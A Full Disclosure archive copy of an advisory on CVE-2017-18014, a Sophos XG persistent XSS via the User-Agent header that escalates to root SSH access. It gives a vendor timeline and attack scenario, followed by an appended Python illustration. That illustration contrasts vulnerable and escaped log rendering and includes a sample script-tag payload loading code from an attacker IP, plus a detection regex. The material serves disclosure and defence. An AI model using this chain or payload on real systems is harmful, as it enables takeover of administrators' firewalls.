Full Disclosure mailing list archives
SSD Advisory – Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access
From: Maor Shwartz <maors () beyondsecurity com>
Date: Mon, 8 Jan 2018 08:29:02 +0200
SSD Advisory – Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access

Full report: https://blogs.securiteam.com/index.php/archives/3612
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD

Vulnerability Summary

The following advisory describes an unauthenticated persistent XSS that leads to unauthorized root access, found in Sophos XG version 17.

Sophos XG Firewall “provides unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos iView for centralized reporting across multiple firewalls.”

Credit

An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response

Sophos was informed of the vulnerability; their response was:
- On December 11th, we both received and acknowledged your submission of the issue
- On December 12th, we confirmed the issue and started working on a fix
- On December 20th, we released the official fix in XGv17 MR3: https://community.sophos.com/products/xg-firewall/b/xg-blog/posts/sfos-17-0-3-mr3-released
- On December 29th, we finished the automatic distribution of the fix backports to all previous releases of XGv16, v16.5, v17
- On December 31st, we published our security advisory with the acknowledgement as per your request: https://community.sophos.com/kb/en-us/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&elq=1514ab02d2764e8cb73e6b0bdbe7e7be&elqaid=2739&elqat=1&elqCampaignId=27053

CVE: CVE-2017-18014

Vulnerability details

An unauthenticated user can trigger a persistent XSS vulnerability in the WAF log page (Control Center -> Log Viewer -> filter option “Web Server Protection”) of the webadmin interface. The injected script runs in the browser of the administrator who views that page, so it can perform any action the firewall’s webadmin can, such as creating a new user, enabling SSH and adding an SSH auth-key.
To trigger the vulnerability we will demonstrate the following scenario:
- Sophos XG Firewall will be configured with 3 zones: Trusted, Untrusted, DMZ
- A web server will be placed in the DMZ
- The firewall will protect the web server using the Web Application Firewall (WAF) with the default Sophos recommendation
- An attacker, from the Untrusted network, will send a URL request to the web server in the DMZ. This causes the injection of the script into the WAF log page
- An admin, from Trusted, will visit the WAF log page
- The script, without any other interaction or alert, will add an SSH auth-key to the admin user and will allow SSH administration from Untrusted
- The attacker will get a full root SSH shell

The Sophos XG WAF log page will execute the “User-Agent” header of the logged POST request: a script placed in that header is rendered into the page and runs when the admin views it.

--
Thanks
Maor Shwartz
Beyond Security
GPG Key ID: 6D273779F52A9FC2
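To make the mechanism concrete, here is an added illustration in Python; it is not part of the advisory and not Sophos code. A toy log viewer renders the User-Agent of logged WAF requests into an HTML table the way a vulnerable page would, the same viewer with output encoding shows what the fix has to do, and a small check scans log entries for User-Agent values carrying markup, which is how a defender would triage WAF logs for this attack. The log entries, field names and the placeholder `<script src=...>` payload are constructed for the example.

```python
import html
import re

# Constructed WAF log entries for the example (not real Sophos XG log data).
# The third entry models the advisory's attack: an unauthenticated client in
# the Untrusted zone sends a request to the DMZ web server with markup in the
# User-Agent header, and the firewall stores it in the WAF log.
SAMPLE_WAF_LOG = [
    {"src_ip": "203.0.113.10", "method": "GET", "url": "/index.html",
     "user_agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/57.0"},
    {"src_ip": "203.0.113.11", "method": "POST", "url": "/login",
     "user_agent": "curl/7.58.0"},
    {"src_ip": "198.51.100.7", "method": "POST", "url": "/",
     "user_agent": '<script src="http://198.51.100.7/x.js"></script>'},
]

COLUMNS = ("src_ip", "method", "url", "user_agent")


def render_row_vulnerable(entry):
    """Render one log row with raw field values (the flaw the advisory
    describes): anything the client put in User-Agent lands in the admin's
    page as live HTML and runs with the admin's webadmin session."""
    cells = "".join("<td>%s</td>" % entry[col] for col in COLUMNS)
    return "<tr>%s</tr>" % cells


def render_row_fixed(entry):
    """Same row, with every attacker-controlled value HTML-escaped so the
    browser displays it as text instead of parsing it as markup."""
    cells = "".join("<td>%s</td>" % html.escape(str(entry[col]), quote=True)
                    for col in COLUMNS)
    return "<tr>%s</tr>" % cells


def render_log_table(entries, render_row):
    """Build the whole log table with the given row renderer."""
    header = "".join("<th>%s</th>" % col for col in COLUMNS)
    rows = "".join(render_row(e) for e in entries)
    return "<table><tr>%s</tr>%s</table>" % (header, rows)


# Tags, javascript: URLs and inline event handlers have no business in a
# User-Agent string; flag them when reviewing WAF logs for this attack.
_SUSPICIOUS_UA = re.compile(r"<\s*/?\s*[a-zA-Z!]|javascript\s*:|\bon\w+\s*=",
                            re.IGNORECASE)


def find_injected_user_agents(entries):
    """Return the log entries whose User-Agent looks like an XSS payload."""
    return [e for e in entries if _SUSPICIOUS_UA.search(e["user_agent"])]


if __name__ == "__main__":
    print("vulnerable row:", render_row_vulnerable(SAMPLE_WAF_LOG[2]))
    print("fixed row:     ", render_row_fixed(SAMPLE_WAF_LOG[2]))
    for e in find_injected_user_agents(SAMPLE_WAF_LOG):
        print("suspicious User-Agent from %s: %r" % (e["src_ip"], e["user_agent"]))
```

Encoding at the point of rendering is the relevant fix for a log viewer, since the logged value must be stored verbatim to be useful as evidence; the regex is a coarse triage aid for reviewing logs after the fact, not a filter to put in front of the WAF.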
Attachment: SSD Advisory – Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access.pdf
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/